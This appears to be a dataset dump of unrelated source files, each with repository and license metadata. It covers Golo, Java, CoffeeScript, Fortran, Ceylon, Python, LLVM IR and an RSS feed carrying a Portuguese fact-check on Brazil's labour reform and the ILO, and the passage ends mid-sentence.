self: _basicDBObject(BasicDBObject(fieldsMap))
return self
}
function toJsonString = |self| -> JSON.stringify(self: toMap())
function fromJsonString = |self, jsonString| {
let bo = BasicDBObject()
bo: putAll(JSON.parse(jsonString))
self: _basicDBObject(bo)
return self
}
}
| Golo | 4 | TypeUnsafe/golo-tour | 06-Golo.17.JugSummerCamp/07-golo-projects/sparkee.mongo.hi/imports/mongoo.golo | [
"MIT"
] |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.spark.shuffle.api.metadata;
import java.io.Serializable;
/**
* :: Private ::
* An opaque metadata tag for registering the result of committing the output of a
* shuffle map task.
* <p>
* All implementations must be serializable since this is sent from the executors to
* the driver.
*/
public interface MapOutputMetadata extends Serializable {}
| Java | 4 | kesavanvt/spark | core/src/main/java/org/apache/spark/shuffle/api/metadata/MapOutputMetadata.java | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] |
# comment
module.exports =
data:
trueKey: true
falseKey: false
subKey:
subProp: 1
| Literate CoffeeScript | 3 | NitroBAY/interpret | test/fixtures/litcoffee/3/test.litcoffee | [
"MIT"
] |
C Copyright(c) 1998, Space Science and Engineering Center, UW-Madison
C Refer to "McIDAS Software Acquisition and Distribution Policies"
C in the file mcidas/data/license.txt
C *** $Id: nvxps.dlm,v 1.1 2000/10/20 19:17:20 daves Exp $ ***
FUNCTION NVXINI(IFUNC,IPARMS)
DIMENSION IPARMS(*)
REAL*8 DRAD,DECC
CHARACTER*4 CLIT
COMMON/PSCOM/XROW,XCOL,XLAT1,XSPACE,XQLON,XBLAT,ITYPE,XPOLE,FAC
COMMON/PSCOM/IHEM,IWEST
DATA RAD/.01745329/
IF (IFUNC.EQ.1) THEN
IF (IPARMS(1).NE.LIT('PS ')) THEN
NVXINI=-1
RETURN
ENDIF
ITYPE=1
XROW=IPARMS(2)
XCOL=IPARMS(3)
IPOLE=IPARMS(11)
IF(IPOLE.EQ.0) IPOLE=900000
IHEM=1
IF(IPOLE.LT.0) IHEM=-1
XPOLE=FLALO(IPOLE)
XLAT1=FLALO(IPOLE-IPARMS(4))*RAD
XSPACE=IPARMS(5)/1000.
XQLON=FLALO(IPARMS(6))
DRAD=IPARMS(7)/1000.D0
R=DRAD
DECC=IPARMS(8)/1.D6
IWEST=IPARMS(10)
IF(IWEST.GE.0) IWEST=1
CALL LLOPT(DRAD,DECC,IWEST,IPARMS(9))
XBLAT=R*SIN(XLAT1)/(XSPACE*TAN(XLAT1*.5))
SCLAT1=(90.-IHEM*FLALO(IPARMS(4)))*RAD
C FAC=SIN(SCLAT1)/TAN(.5*SCLAT1)
FAC=1
ELSE IF (IFUNC.EQ.2) THEN
IF(INDEX(CLIT(IPARMS(1)),'XY').NE.0) ITYPE=1
IF(INDEX(CLIT(IPARMS(1)),'LL').NE.0) ITYPE=2
ENDIF
NVXINI=0
RETURN
END
FUNCTION NVXSAE(XLIN,XELE,XDUM,XLAT,XLON,Z)
COMMON/PSCOM/XROW,XCOL,XLAT1,XSPACE,XQLON,XBLAT,ITYPE,XPOLE,FAC
COMMON/PSCOM/IHEM,IWEST
DATA RAD/.01745329/
XLDIF=IHEM*(XLIN-XROW)/XBLAT
XEDIF=(XCOL-XELE)/XBLAT
XRLON=0
IF(.NOT.(XLDIF.EQ.0.AND.XEDIF.EQ.0)) XRLON=ATAN2(XEDIF,XLDIF)
XLON=IWEST*XRLON/RAD+XQLON
IF(XLON.GT.180. ) XLON=XLON-360.
IF(XLON.LT.-180.) XLON=XLON+360.
C***
RADIUS=SQRT(XLDIF*XLDIF+XEDIF*XEDIF)
IF (ABS(RADIUS).LT.1.E-10) THEN
XLAT=IHEM*90
ELSE
XLAT=IHEM*(90.-2*ATAN(EXP(ALOG(RADIUS/FAC)))/RAD)
ENDIF
C***
C IF(XPOLE*XLAT.LT.0.0) GO TO 900
IF(ITYPE.EQ.1) THEN
YLAT=XLAT
YLON=XLON
CALL LLCART(YLAT,YLON,XLAT,XLON,Z)
ENDIF
NVXSAE=0
RETURN
C 900 CONTINUE
C NVXSAE=-1
C RETURN
END
FUNCTION NVXEAS(ZLAT,ZLON,Z,XLIN,XELE,XDUM)
COMMON/PSCOM/XROW,XCOL,XLAT1,XSPACE,XQLON,XBLAT,ITYPE,XPOLE,FAC
COMMON/PSCOM/IHEM,IWEST
DATA RAD/.01745329/
XLAT=ZLAT
XLON=ZLON
IF(ITYPE.EQ.1) THEN
X=XLAT
Y=XLON
CALL CARTLL(X,Y,Z,XLAT,XLON)
ENDIF
C IF(XLAT*XPOLE.LT.0) GO TO 900
XRLON=IHEM*(XLON-XQLON)
IF(XRLON.GT.180. ) XRLON=XRLON-360.
IF(XRLON.LT.-180.) XRLON=XRLON+360.
XRLON=IWEST*XRLON*RAD
XCLAT=(XPOLE-XLAT)*RAD*.5
XRLAT=XBLAT*TAN(XCLAT)
XLIN=XRLAT*COS(XRLON)+XROW
XELE=-XRLAT*SIN(XRLON)+XCOL
NVXEAS=0
RETURN
C 900 CONTINUE
C NVXEAS=-1
C RETURN
END
FUNCTION NVXOPT(IFUNC,XIN,XOUT)
COMMON/PSCOM/XROW,XCOL,XLAT1,XSPACE,XQLON,XBLAT,ITYPE,XPOLE,FAC
COMMON/PSCOM/IHEM,IWEST
REAL*4 XIN(*),XOUT(*)
CHARACTER*4 CLIT,CFUNC
DATA RAD/.01745329/
C
C IFUNC= 'SPOS' SUBSATELLITE LAT/LON
C
C XIN - NOT USED
C XOUT - 1. STANDARD LATITUDE
C - 2. NORMAL LONGITUDE
C
C IFUNC= 'ORAD' OBLATE RADIUS
C
C XIN - LATITUDE
C XOUT - RADIUS IN KM
C
CFUNC=CLIT(IFUNC)
NVXOPT=0
IF(CFUNC.EQ.'SPOS') THEN
XOUT(1)=XPOLE-XLAT1/RAD
XOUT(2)=XQLON
ELSE IF(CFUNC.EQ.'ORAD') THEN
CALL LLOBL(XIN,XOUT)
ELSE
NVXOPT=1
ENDIF
RETURN
END
| IDL | 3 | oxelson/gempak | extlibs/AODT/v72/odtmcidas/navcal/navcal/nvxps.dlm | [
"BSD-3-Clause"
] |
/********************************************************************************
* Copyright (c) {date} Red Hat Inc. and/or its affiliates and others
*
* This program and the accompanying materials are made available under the
* terms of the Apache License, Version 2.0 which is available at
* http://www.apache.org/licenses/LICENSE-2.0
*
* SPDX-License-Identifier: Apache-2.0
********************************************************************************/
import com.intellij.openapi.\imodule {
Module
}
import com.intellij.openapi.vfs {
VirtualFile
}
import com.intellij.psi {
PsiClass,
PsiMethod
}
import org.eclipse.ceylon.ide.common.model {
JavaClassFile
}
import org.eclipse.ceylon.model.loader.model {
LazyPackage
}
shared class IdeaJavaClassFile(
PsiClass cls,
String filename,
String relativePath,
String fullPath,
LazyPackage pkg)
extends JavaClassFile<Module,VirtualFile,VirtualFile,PsiClass,PsiClass|PsiMethod>
(cls, filename, relativePath, fullPath, pkg)
satisfies IdeaJavaModelAware {
javaClassRootToNativeFile(PsiClass javaClassRoot)
=> javaClassRoot.containingFile.virtualFile;
javaClassRootToNativeRootFolder(PsiClass javaClassRoot)
=> javaClassRoot.containingFile.virtualFile.parent;
}
| Ceylon | 3 | Kopilov/ceylon-ide-intellij | source/org/eclipse/ceylon/ide/intellij/model/IdeaJavaClassFile.ceylon | [
"Apache-2.0"
] |
from .api_key import APIKeyCookie as APIKeyCookie
from .api_key import APIKeyHeader as APIKeyHeader
from .api_key import APIKeyQuery as APIKeyQuery
from .http import HTTPAuthorizationCredentials as HTTPAuthorizationCredentials
from .http import HTTPBasic as HTTPBasic
from .http import HTTPBasicCredentials as HTTPBasicCredentials
from .http import HTTPBearer as HTTPBearer
from .http import HTTPDigest as HTTPDigest
from .oauth2 import OAuth2 as OAuth2
from .oauth2 import OAuth2AuthorizationCodeBearer as OAuth2AuthorizationCodeBearer
from .oauth2 import OAuth2PasswordBearer as OAuth2PasswordBearer
from .oauth2 import OAuth2PasswordRequestForm as OAuth2PasswordRequestForm
from .oauth2 import OAuth2PasswordRequestFormStrict as OAuth2PasswordRequestFormStrict
from .oauth2 import SecurityScopes as SecurityScopes
from .open_id_connect_url import OpenIdConnect as OpenIdConnect
| Python | 4 | Aryabhata-Rootspring/fastapi | fastapi/security/__init__.py | [
"MIT"
] |
; ModuleID = 'go1.17.go'
source_filename = "go1.17.go"
target datalayout = "e-m:e-p:32:32-i64:64-n32:64-S128"
target triple = "wasm32--wasi"
declare noalias nonnull i8* @runtime.alloc(i32, i8*, i8*)
define hidden void @main.init(i8* %context, i8* %parentHandle) unnamed_addr {
entry:
ret void
}
define hidden i8* @main.Add32(i8* %p, i32 %len, i8* %context, i8* %parentHandle) unnamed_addr {
entry:
%0 = getelementptr i8, i8* %p, i32 %len
ret i8* %0
}
define hidden i8* @main.Add64(i8* %p, i64 %len, i8* %context, i8* %parentHandle) unnamed_addr {
entry:
%0 = trunc i64 %len to i32
%1 = getelementptr i8, i8* %p, i32 %0
ret i8* %1
}
define hidden [4 x i32]* @main.SliceToArray(i32* %s.data, i32 %s.len, i32 %s.cap, i8* %context, i8* %parentHandle) unnamed_addr {
entry:
%0 = icmp ult i32 %s.len, 4
br i1 %0, label %slicetoarray.throw, label %slicetoarray.next
slicetoarray.throw: ; preds = %entry
call void @runtime.sliceToArrayPointerPanic(i8* undef, i8* null)
unreachable
slicetoarray.next: ; preds = %entry
%1 = bitcast i32* %s.data to [4 x i32]*
ret [4 x i32]* %1
}
declare void @runtime.sliceToArrayPointerPanic(i8*, i8*)
define hidden [4 x i32]* @main.SliceToArrayConst(i8* %context, i8* %parentHandle) unnamed_addr {
entry:
%makeslice = call i8* @runtime.alloc(i32 24, i8* undef, i8* null)
br i1 false, label %slicetoarray.throw, label %slicetoarray.next
slicetoarray.throw: ; preds = %entry
unreachable
slicetoarray.next: ; preds = %entry
%0 = bitcast i8* %makeslice to [4 x i32]*
ret [4 x i32]* %0
}
define hidden { i32*, i32, i32 } @main.SliceInt(i32* dereferenceable_or_null(4) %ptr, i32 %len, i8* %context, i8* %parentHandle) unnamed_addr {
entry:
%0 = icmp ugt i32 %len, 1073741823
%1 = icmp eq i32* %ptr, null
%2 = icmp ne i32 %len, 0
%3 = and i1 %1, %2
%4 = or i1 %3, %0
br i1 %4, label %unsafe.Slice.throw, label %unsafe.Slice.next
unsafe.Slice.throw: ; preds = %entry
call void @runtime.unsafeSlicePanic(i8* undef, i8* null)
unreachable
unsafe.Slice.next: ; preds = %entry
%5 = insertvalue { i32*, i32, i32 } undef, i32* %ptr, 0
%6 = insertvalue { i32*, i32, i32 } %5, i32 %len, 1
%7 = insertvalue { i32*, i32, i32 } %6, i32 %len, 2
ret { i32*, i32, i32 } %7
}
declare void @runtime.unsafeSlicePanic(i8*, i8*)
define hidden { i8*, i32, i32 } @main.SliceUint16(i8* dereferenceable_or_null(1) %ptr, i16 %len, i8* %context, i8* %parentHandle) unnamed_addr {
entry:
%0 = icmp eq i8* %ptr, null
%1 = icmp ne i16 %len, 0
%2 = and i1 %0, %1
br i1 %2, label %unsafe.Slice.throw, label %unsafe.Slice.next
unsafe.Slice.throw: ; preds = %entry
call void @runtime.unsafeSlicePanic(i8* undef, i8* null)
unreachable
unsafe.Slice.next: ; preds = %entry
%3 = zext i16 %len to i32
%4 = insertvalue { i8*, i32, i32 } undef, i8* %ptr, 0
%5 = insertvalue { i8*, i32, i32 } %4, i32 %3, 1
%6 = insertvalue { i8*, i32, i32 } %5, i32 %3, 2
ret { i8*, i32, i32 } %6
}
define hidden { i32*, i32, i32 } @main.SliceUint64(i32* dereferenceable_or_null(4) %ptr, i64 %len, i8* %context, i8* %parentHandle) unnamed_addr {
entry:
%0 = icmp ugt i64 %len, 1073741823
%1 = icmp eq i32* %ptr, null
%2 = icmp ne i64 %len, 0
%3 = and i1 %1, %2
%4 = or i1 %3, %0
br i1 %4, label %unsafe.Slice.throw, label %unsafe.Slice.next
unsafe.Slice.throw: ; preds = %entry
call void @runtime.unsafeSlicePanic(i8* undef, i8* null)
unreachable
unsafe.Slice.next: ; preds = %entry
%5 = trunc i64 %len to i32
%6 = insertvalue { i32*, i32, i32 } undef, i32* %ptr, 0
%7 = insertvalue { i32*, i32, i32 } %6, i32 %5, 1
%8 = insertvalue { i32*, i32, i32 } %7, i32 %5, 2
ret { i32*, i32, i32 } %8
}
define hidden { i32*, i32, i32 } @main.SliceInt64(i32* dereferenceable_or_null(4) %ptr, i64 %len, i8* %context, i8* %parentHandle) unnamed_addr {
entry:
%0 = icmp ugt i64 %len, 1073741823
%1 = icmp eq i32* %ptr, null
%2 = icmp ne i64 %len, 0
%3 = and i1 %1, %2
%4 = or i1 %3, %0
br i1 %4, label %unsafe.Slice.throw, label %unsafe.Slice.next
unsafe.Slice.throw: ; preds = %entry
call void @runtime.unsafeSlicePanic(i8* undef, i8* null)
unreachable
unsafe.Slice.next: ; preds = %entry
%5 = trunc i64 %len to i32
%6 = insertvalue { i32*, i32, i32 } undef, i32* %ptr, 0
%7 = insertvalue { i32*, i32, i32 } %6, i32 %5, 1
%8 = insertvalue { i32*, i32, i32 } %7, i32 %5, 2
ret { i32*, i32, i32 } %8
}
| LLVM | 4 | JAicewizard/tinygo | compiler/testdata/go1.17.ll | [
"Apache-2.0"
] |
<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>Agência Pública</title> <atom:link href="https://apublica.org/feed/" rel="self" type="application/rss+xml" /><link>https://apublica.org</link> <description></description> <lastBuildDate>Fri, 29 Jun 2018 19:26:19 +0000</lastBuildDate> <language>pt-BR</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>https://wordpress.org/?v=4.9.6</generator> <item><title>OIT ainda analisa denúncia sobre reforma trabalhista</title><link>https://apublica.org/2018/06/truco-oit-ainda-analisa-denuncia-sobre-reforma-trabalhista/</link> <comments>https://apublica.org/2018/06/truco-oit-ainda-analisa-denuncia-sobre-reforma-trabalhista/#respond</comments> <pubDate>Fri, 29 Jun 2018 19:26:19 +0000</pubDate> <dc:creator><![CDATA[Ethel Rudnitzki]]></dc:creator> <category><![CDATA[Português]]></category> <category><![CDATA[Desemprego]]></category> <category><![CDATA[Michel Temer]]></category> <category><![CDATA[PDT]]></category> <category><![CDATA[reforma trabalhista]]></category> <category><![CDATA[trabalho]]></category><guid isPermaLink="false">http://apublica.org/?post_type=claim_review&p=48110</guid> <description><![CDATA[Órgão internacional colocou o país em lista provisória sobre violações e pediu esclarecimentos; ainda não é possível saber o impacto das mudanças]]></description> <content:encoded><![CDATA[<figure id="attachment_48114" aria-describedby="figcaption_attachment_48114" class="wp-caption aligncenter" itemscope itemtype="http://schema.org/ImageObject"><div class="imageAndSource"><div class='inline-image-source image-source p-1 text-right'>Crozet / Pouteau / Albouy / OIT</div><img itemprop="contentURL" class="wp-image-48114 size-full" src="https://apublica.org/wp-content/uploads/2018/06/conferencia-internacional-do-trabalho.jpg" alt="Reunião da 107ª Conferência Internacional do Trabalho, da OIT, em que o Brasil foi chamado a explicar mudança feita pela reforma trabalhista" width="2048" height="1366" srcset="https://apublica.org/wp-content/uploads/2018/06/conferencia-internacional-do-trabalho.jpg 2048w, https://apublica.org/wp-content/uploads/2018/06/conferencia-internacional-do-trabalho-800x534.jpg 800w, https://apublica.org/wp-content/uploads/2018/06/conferencia-internacional-do-trabalho-1600x1067.jpg 1600w" sizes="(max-width: 2048px) 100vw, 2048px" /></div><figcaption id="figcaption_attachment_48114" class="wp-caption-text caption" itemprop="description">Reunião da 107ª Conferência Internacional do Trabalho, da OIT, em que o Brasil foi chamado a explicar mudança feita pela reforma trabalhista</figcaption></figure><p>A reforma trabalhista alterou disposições da Consolidação das Leis do Trabalho (CLT) e tem sido alvo de críticas, intensificadas desde que as mudanças entraram em vigor, em novembro de 2017. Denúncias de que as mudanças na lei teriam reduzido ou suprimido direitos foram apresentadas por entidades sindicais à Organização Internacional do Trabalho (OIT), agência da Organização das Nações Unidas (ONU). A principal acusação é de que a reforma fere uma convenção internacional, por conta da prevalência de acordos negociados entre patrões e alguns tipos de empregados.</p><p>A oposição, que apoia as denúncias, alega que as mudanças na legislação acarretaram a inclusão do Brasil na “lista suja” da OIT – uma relação de países que descumprem normas internacionais sobre trabalho – e ainda destaca os efeitos negativos que a alteração legislativa teria no mercado de trabalho. Já o governo comemora as decisões da organização internacional, afirmando que isentam o Brasil de violar os direitos trabalhistas.</p><p>O <strong><a href="https://apublica.org/truco">Truco</a></strong> – projeto de checagem de fatos da <a href="https://apublica.org"><strong>Agência Pública</strong></a> – verificou quatro frases sobre o tema, duas de autoria da senadora Ângela Portela (PDT-RR) e duas do ministro do Trabalho, Helton Yomura. As afirmações do ministro constam em um <a href="http://www.brasil.gov.br/editoria/emprego-e-previdencia/2018/06/reforma-trabalhista-respeita-direitos-coletivos-confirma-oit">texto publicado no site do Planalto</a>, enquanto as declarações de Portela foram feitas em <a href="https://www25.senado.leg.br/web/atividade/notas-taquigraficas/-/notas/s/23426">sessão deliberativa no Senado</a>, no dia 12 de junho.</p><hr /><p><strong><a id="checagem1"></a>“O Brasil foi incluído na ‘lista suja’ da Organização Internacional do Trabalho, a OIT.” – Ângela Portela (PDT-RR), senadora.</strong></p><p><img class="alignleft" src="https://apublica.org/wp-content/uploads/2017/05/exagerado-400.jpg" alt="Exagerado" width="400" height="400" />A senadora Ângela Portela (PDT-RR) afirmou recentemente que o Brasil foi incluído na “lista suja” da Organização Internacional do Trabalho (OIT). Essa relação traz os países que violam normas trabalhistas internacionais, segundo análise dos técnicos da entidade. O país na verdade faz parte de uma lista preliminar, e a avaliação para que seja incluído na lista definitiva ainda não terminou. Por isso, a afirmação foi considerada exagerada.</p><p>A assessoria de imprensa da senadora atribuiu a fonte da afirmação a um <a href="https://www.anamatra.org.br/imprensa/noticias/26571-caso-brasil-na-oit-brasil-continua-na-lista-suja-e-tera-de-dar-explicacoes-a-oit-sobre-reforma-trabalhista?highlight=WyJvaXQiXQ==">artigo publicado pela Associação Nacional dos Magistrados da Justiça do Trabalho (Anamatra)</a>. O texto diz que <a href="http://www.ilo.org/wcmsp5/groups/public/---ed_norm/---relconf/documents/meetingdocument/wcms_631799.pdf">o relatório da 107ª Conferência Internacional do Trabalho, que ocorreu de 28 de maio a 8 de junho, em Genebra, na Suíça</a>, incluiu o Brasil no grupo de 24 países que fazem parte da “lista suja”. O documento, no entanto, não chegou a essa conclusão – informa apenas que a análise sobre a situação brasileira ainda está em aberto.</p><p>O Brasil <a href="http://www.ilo.org/dyn/normlex/en/f?p=1000:11200:0::NO:11200:P11200_COUNTRY_ID:102571">ratificou 97 convenções da OIT</a>, sete delas classificadas como fundamentais pela organização – ou seja, são definidoras de uma série de princípios que precisam ser seguidos em relação a diferentes aspectos do trabalho. Entre essas últimas está a de <a href="http://www.ilo.org/brasilia/temas/normas/WCMS_235188/lang--pt/index.htm">número 98, que trata do direito de sindicalização e de negociação coletiva</a>,<a href="http://www.trtsp.jus.br/geral/tribunal2/LEGIS/CLT/OIT/OIT_098.html"> ratificada em 1952</a>.</p><p><!-- alsoRead -->A reforma trabalhista, estabelecida pela <a href="http://www.planalto.gov.br/ccivil_03/_ato2015-2018/2017/lei/l13467.htm">Lei nº 13.467/2017</a>, alterou as normas de acordos coletivos no Brasil. Os acordos individuais entre trabalhador e patrão, estabelecidos pelo artigo <a href="http://www.planalto.gov.br/ccivil_03/Decreto-Lei/Del5452.htm#art444p">444 da Consolidação das Leis do Trabalho (CLT)</a>, passaram a ter “a mesma eficácia legal e preponderância sobre os instrumentos coletivos, no caso de empregado portador de diploma de nível superior e que receba salário mensal igual ou superior a duas vezes o limite máximo dos benefícios do Regime Geral de Previdência Social”. Isso quer dizer que indivíduos com salários iguais ou superiores a R$ 11.062,62 agora podem fechar acordos diferentes daqueles mediados por entidades sindicais com empregadores.</p><p>Segundo entidades sindicais brasileiras, isso viola o direito de negociação coletiva estabelecido pela OIT na Convenção nº 98. Denúncias a respeito disso foram levadas ao <a href="http://www.ilo.org/global/standards/applying-and-promoting-international-labour-standards/committee-of-experts-on-the-application-of-conventions-and-recommendations/lang--en/index.htm">Comitê de Peritos na Aplicação de Convenções e Recomendações</a> da organização em agosto e setembro de 2017. O comitê <a href="http://www.ilo.org/dyn/normlex/en/f?p=NORMLEXPUB:13100:0::NO::P13100_COMMENT_ID:3523855">analisou o caso e mostrou preocupação a respeito das mudanças</a> na lei, pedindo então para o governo brasileiro analisar as críticas e apresentar uma resposta em 2018.</p><p>A análise levou o <a href="http://www.ilo.org/wcmsp5/groups/public/---ed_norm/---relconf/documents/meetingdocument/wcms_627030.pdf">Comitê de Aplicação de Normas (CAS, na sigla em inglês) da OIT a colocar o Brasil na lista longa de 40 países denunciados por violar convenções fundamentais</a>. Essa lista funciona como um documento preliminar a ser avaliado pelo Comitê da Conferência Internacional do Trabalho, que então formula uma lista menor, chamada “lista curta”, ou “lista suja” da OIT.</p><p>Mesmo sendo apenas uma indicação preliminar e não uma inclusão na lista definitiva, a situação foi criticada pela defesa do governo brasileiro na <a href="http://www.ilo.org/wcmsp5/groups/public/---ed_norm/---relconf/documents/meetingdocument/wcms_631799.pdf">107ª Conferência Internacional do Trabalho</a>. Na ocasião, o governo disse que “a inclusão do Brasil na lista do CAS configura um julgamento precipitado da situação brasileira antes de ouvir o governo, apesar dos padrões básicos para o processo.”</p><p>Como a análise sobre a possível violação do Brasil da Convenção nº 98 ainda não terminou, o país não está incluído na “lista suja” definitiva. Ainda assim, a denúncia foi acatada e, pelo comitê de aplicação de normas, o Brasil está sob análise entre os países suspeitos de violar convenções fundamentais, fazendo parte de uma lista preliminar. Procurada pelo <strong>Truco</strong>, a OIT não quis se pronunciar sobre o caso.</p><p>Após receber os selos, a assessoria de imprensa argumentou que a senadora não fez distinção entre lista preliminar e lista definitiva em sua fala: “Quando se fala que o Brasil foi incluído na lista suja, não se fez distinção entre ‘lista preliminar’ e ‘lista definitiva’. Se está incluído na lista preliminar…está incluído na lista. Não há qualquer exagero aí”. Há porém diferenças entre as duas listagens, conforme explicado na checagem.</p><hr /><p><strong><a id="checagem2"></a>“Após ouvir os argumentos dos trabalhadores, dos empregadores e do governo, a comissão decidiu apenas solicitar informações adicionais ao governo brasileiro.” – Helton Yomura, ministro do Trabalho.</strong></p><p><img class="alignleft" src="https://apublica.org/wp-content/uploads/2017/06/sem-contexto-400.jpg" alt="Sem contexto" width="400" height="400" /></p><p>O ministro do Trabalho, Helton Yomura, referiu-se em sua frase a uma decisão do Comitê da 107ª Conferência Internacional do Trabalho. Na conclusão do evento, o órgão solicitou informações adicionais ao governo sobre a reforma trabalhista brasileira e seus impactos. Essa de fato foi a única decisão tomada até o momento, mas pode resultar na inclusão do país na “lista suja” dos que violam leis trabalhistas. A posição final da OIT a respeito da mudança na legislação ainda não foi tomada e depende da resposta do Brasil. A afirmação do ministro Helton Yomura traz dados verdadeiros, mas sem contexto.</p><p>Denunciado ao Comitê de Aplicação de Normas por violar a<a href="http://www.ilo.org/brasilia/temas/normas/WCMS_235188/lang--pt/index.htm"> Convenção nº 98</a> da OIT com a reforma trabalhista, o governo brasileiro foi convidado a se explicar durante a<a href="http://www.ilo.org/wcmsp5/groups/public/---ed_norm/---relconf/documents/meetingdocument/wcms_631799.pdf"> 107ª Conferência Internacional do Trabalho</a>. Foram ouvidas as defesas do Ministério do Trabalho, de representantes dos empregadores e de trabalhadores.</p><p>O governo afirmou que a legislação brasileira não afeta a livre organização sindical e o direito à negociação coletiva, garantidos pelas normas da OIT. Já os representantes dos trabalhadores brasileiros afirmaram que a reforma trabalhista constitui “o ataque mais grave aos direitos sindicais e dos trabalhadores em toda a história do Brasil”. Governos de outros países e seus respectivos representantes sindicais e empregadores divergiram sobre a questão.</p><p>Dentre os argumentos do governo e de apoiadores da reforma estava o fato de que a denúncia e a análise feitas pelo<a href="http://www.ilo.org/global/standards/applying-and-promoting-international-labour-standards/conference-committee-on-the-application-of-standards/lang--en/index.htm"> Comitê de Aplicação de Normas</a> ocorreram fora do ciclo regular de análises. Em situações normais, países que ratificam convenções da OIT, como é o caso do Brasil, devem apresentar a cada três anos um relatório a respeito da situação de cada convenção em seu país a um<a href="http://www.ilo.org/global/standards/applying-and-promoting-international-labour-standards/committee-of-experts-on-the-application-of-conventions-and-recommendations/lang--en/index.htm"> Comitê de Peritos</a>. O Brasil apresentou o último relatório a respeito da Convenção nº 98 em 2016 e o próximo está previsto para 2019. A reforma trabalhista entrou em vigor no ano passado, ou seja, nesse intervalo. Assim, a situação brasileira não pôde ser analisada ainda.</p><p>Levando isso em conta, o Comitê da Conferência Internacional do Trabalho, em suas conclusões, deu um prazo de alguns meses para que o Brasil apresentasse mais informações sobre o caso. Foram pedidos esclarecimentos em dois pontos: sobre a aplicação dos princípios de negociação coletiva livre e voluntária na nova lei trabalhista; e sobre as consultas tripartites com os interlocutores sociais a respeito da reforma trabalhista, conforme apontado no<a href="http://www.ilo.org/wcmsp5/groups/public/---ed_norm/---relconf/documents/meetingdocument/wcms_631799.pdf"> relatório da conferência</a> pela assessoria do ministério.</p><p>Isso não quer dizer, contudo, que a OIT considera que a reforma respeitou os direitos trabalhistas,<a href="http://www.brasil.gov.br/editoria/emprego-e-previdencia/2018/06/reforma-trabalhista-respeita-direitos-coletivos-confirma-oit"> como diz o Ministério do Trabalho</a>. Só depois que o governo brasileiro apresentar as informações solicitadas é que a organização tomará uma decisão final.</p><p>A equipe do ministro foi comunicada sobre o selo e enviou a seguinte resposta: “O pedido de informações formulado para a OIT é um fato que foi amplamente noticiado. A não tomada de posição da OIT em relação às mudanças advindas com a modernização trabalhista, que entrou em vigor em novembro de 2017 (há sete meses portanto), é algo que, pelo calendário da entidade, só pode ser objeto de avaliação em 2019. A possibilidade de a OIT vir a incluir o Brasil na chamada “lista suja” pressupõe da mesma forma que a entidade pode chegar à conclusão de que a modernização trabalhista não viola direitos dos trabalhadores brasileiros, como o Ministério do Trabalho defende e que certamente será comprovado após a análise das informações prestadas. Qualquer entendimento diferente desse é pura ilação.”</p><hr /><p><strong><a id="checagem3"></a>“Os direitos trabalhistas têm proteção constitucional e não podem ser retirados [pela reforma trabalhista], nem há reforma da própria Constituição.” – Helton Yomura, ministro do Trabalho.</strong></p><p><img class="alignleft" src="https://apublica.org/wp-content/uploads/2017/05/exagerado-400.jpg" alt="Exagerado" width="400" height="400" />Muitos direitos trabalhistas não estão previstos na Constituição, mas na<a href="http://www.planalto.gov.br/ccivil_03/decreto-lei/Del5452.htm"> Consolidação das Leis do Trabalho (CLT)</a> ou em outras leis ordinárias. Nem todos os direitos trabalhistas têm proteção constitucional e alguns deles foram, de fato, alterados pela reforma aprovada pelo governo do presidente Michel Temer (PMDB). Por isso, a frase é exagerada.</p><p>Procurada pelo <strong>Truco</strong>, a equipe do ministro afirma que os artigos 7º e 8º da<a href="http://www.planalto.gov.br/ccivil_03/constituicao/constituicao.htm"> Constituição Federal</a> listam os direitos dos trabalhadores e de organização sindical. “Como a Constituição é norma hierarquicamente superior à CLT, os direitos ali relacionados não podem ser derrogados por norma inferior. Sequer emenda constitucional poderia derrogar esses direitos, já que se trata de cláusulas pétreas”, disse a assessoria do Ministério do Trabalho. Destacou ainda um trecho da<a href="http://www2.camara.leg.br/legin/fed/lei/2017/lei-13467-13-julho-2017-785204-publicacaooriginal-153369-pl.html"> reforma trabalhista</a>. O artigo indicado, 611-B, atesta que nenhuma convenção ou acordo coletivo de trabalho pode suprimir ou reduzir os direitos listados ali. No entanto, o texto traz apenas uma parte dos direitos trabalhistas estabelecidos pela legislação brasileira. Não estão na lista algumas garantias previstas em leis ordinárias, nem a totalidade das disposições contidas na CLT.</p><p>O artigo 611-A, no entanto, traz disposições opostas. Nele estão listados os direitos trabalhistas que podem ser alterados a partir da vigência da nova legislação. No grupo de direitos que podem ser negociados por meio de convenção coletiva ou acordo coletivo de trabalho estão aspectos importantes como tempo de jornada de trabalho, adesão ao Programa Seguro-Emprego (PSE), enquadramento do grau de insalubridade e intervalo intrajornada.</p><p>A advogada Adriana Giori de Barros, do escritório Bertolucci e Ramos Gonçalves, afirma que os direitos constitucionais não foram reduzidos pela reforma trabalhista. Ela no entanto destaca que a Constituição Federal define as linhas gerais dos direitos dos trabalhadores, enquanto a CLT é o principal instrumento regulamentador das relações de trabalho.</p><p>Professor de direito trabalhista da Universidade de São Paulo (USP) e sócio do Siqueira Castro, Otávio Pinto e Silva concorda com a classificação das legislações. Para ele, a Constituição, norma de hierarquia superior, estabelece um parâmetro de proteção mínima, mas as especificidades ficam a cargo da CLT. “Há muitos direitos que estão abaixo da Constituição e que numa alteração da CLT você pode limitar ou reduzir”, explica.</p><p>Um exemplo dado pelo professor é a legislação que determina as modalidades de contratação de trabalhadores no Brasil. Enquanto o artigo 7º da Constituição determina que o 